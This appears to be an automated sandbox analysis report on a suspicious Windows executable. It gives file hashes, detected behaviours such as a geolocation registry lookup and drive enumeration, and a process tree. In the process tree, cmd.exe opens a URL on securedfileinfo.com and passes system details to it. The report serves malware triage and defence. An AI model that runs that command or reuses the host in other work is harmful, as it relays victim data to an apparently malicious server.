Analysis
-
max time kernel
151s -
max time network
168s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
27/11/2022, 15:44
Static task
static1
Behavioral task
behavioral1
Sample
1aa826c04f33960f5dcc6ad0e980b1b0cd9b8da0c07e5c09e3f47d561fbb7264.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
1aa826c04f33960f5dcc6ad0e980b1b0cd9b8da0c07e5c09e3f47d561fbb7264.exe
Resource
win10v2004-20221111-en
General
-
Target
1aa826c04f33960f5dcc6ad0e980b1b0cd9b8da0c07e5c09e3f47d561fbb7264.exe
-
Size
149KB
-
MD5
4ad44d23575a3c551c379c35ca07ae34
-
SHA1
86c734b6a759ebfd5594581a504f5234a2d14b5c
-
SHA256
1aa826c04f33960f5dcc6ad0e980b1b0cd9b8da0c07e5c09e3f47d561fbb7264
-
SHA512
075b546a7a1032ecff78741298b884b569c8790277620f5fd498a875ba6a0c1679007af355dfa144e0b2dc88f8d7e188aa156789876faf58070b8c3b2378e173
-
SSDEEP
1536:Q9FX/kSS8Rr3/9ph8vVS22oCJIY0meA1SNxbJY2J+7jQ21nV2m:gkSS2hbJI/NxbJY2J+7jQ21nwm
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation 1aa826c04f33960f5dcc6ad0e980b1b0cd9b8da0c07e5c09e3f47d561fbb7264.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1528 1aa826c04f33960f5dcc6ad0e980b1b0cd9b8da0c07e5c09e3f47d561fbb7264.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 1528 1aa826c04f33960f5dcc6ad0e980b1b0cd9b8da0c07e5c09e3f47d561fbb7264.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 1528 wrote to memory of 4340 1528 1aa826c04f33960f5dcc6ad0e980b1b0cd9b8da0c07e5c09e3f47d561fbb7264.exe 96 PID 1528 wrote to memory of 4340 1528 1aa826c04f33960f5dcc6ad0e980b1b0cd9b8da0c07e5c09e3f47d561fbb7264.exe 96 PID 1528 wrote to memory of 4340 1528 1aa826c04f33960f5dcc6ad0e980b1b0cd9b8da0c07e5c09e3f47d561fbb7264.exe 96 PID 4340 wrote to memory of 4628 4340 cmd.exe 100 PID 4340 wrote to memory of 4628 4340 cmd.exe 100 PID 4628 wrote to memory of 1780 4628 msedge.exe 104 PID 4628 wrote to memory of 1780 4628 msedge.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\1aa826c04f33960f5dcc6ad0e980b1b0cd9b8da0c07e5c09e3f47d561fbb7264.exe"C:\Users\Admin\AppData\Local\Temp\1aa826c04f33960f5dcc6ad0e980b1b0cd9b8da0c07e5c09e3f47d561fbb7264.exe"1⤵
- Checks computer location settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "start http://securedfileinfo.com/404.jsp?chid=5300031^&rsn=plde^&details=^|v6.2.9200x64sp0.0ws^|tt53^|dt0^|dc100^|fs-2^|dh0^|ec13^|se12007^|dr4^|ds0^|rs0^|p1"2⤵
- Suspicious use of WriteProcessMemory
PID:4340 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://securedfileinfo.com/404.jsp?chid=5300031&rsn=plde&details=|v6.2.9200x64sp0.0ws|tt53|dt0|dc100|fs-2|dh0|ec13|se12007|dr4|ds0|rs0|p13⤵
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff9c67246f8,0x7ff9c6724708,0x7ff9c67247184⤵PID:1780
-
-
-